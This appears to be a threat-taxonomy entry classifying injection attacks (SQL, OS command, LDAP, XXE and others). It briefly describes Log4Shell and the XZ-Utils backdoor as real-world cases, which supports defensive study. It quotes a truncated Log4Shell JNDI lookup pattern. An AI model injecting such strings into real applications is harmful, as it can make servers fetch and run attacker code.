Skip to content

Injection Exploitations

Info

ID: AT-PE001
Tactic: Payload Execution
Sub-techniques: Arbitrary File Write Exploitation, CRLF Injection, Expression Language Injection, LDAP Injection, NoSQL Injection, OGNL Injection, OS command Injection, SQL Injection, Template Injection, XML Injection, XXE Injection

Injection Exploitations

Injection Exploitations encompass techniques whereby adversaries manipulate application inputs to alter the intended processing of commands, queries, or data. By crafting carefully tailored malicious inputs, attackers can coerce applications into interpreting injected payloads that lead to unintended behaviors or data alterations. Unlike Remote Code Execution Exploitation, which directly grants operational control of the application’s execution flow, Injection Exploitations focus on subverting input handling and processing mechanisms to indirectly facilitate further compromise.

Subtechniques under Injection Exploitations include OS Command Injection, Arbitrary File Write Exploitation, LDAP Injection, XML Injection, XXE Injection, OGNL Injection, CRLF Injection, Template Injection, SQL Injection, NoSQL Injection, and Expression Language Injection. Mitigations involve strict input validation, secure coding practices, and comprehensive testing to ensure that all external inputs are properly sanitized and managed.

Examples in the Wild

Notable Injection Exploitation Attacks:

Log4Shell The Log4Shell vulnerability demonstrated sophisticated injection exploitation through JNDI LDAP lookup strings. By injecting specially crafted strings containing ${jndi:ldap://...} patterns into logged data, attackers could trigger the Log4j library to make LDAP requests to attacker-controlled servers. These servers would respond with malicious Java code that would then be executed by the vulnerable application, effectively turning a simple logging operation into a remote code execution vector.

XZ-Utils Backdoor The XZ-Utils backdoor leveraged injection techniques to compromise the widely-used xz compression library. The attack involved injecting malicious code into build scripts and test files, using multiple layers of obfuscation including RC4 encryption and XZ compression. The injected code specifically targeted SSH authentication mechanisms, demonstrating how injection attacks can be used to compromise critical security infrastructure.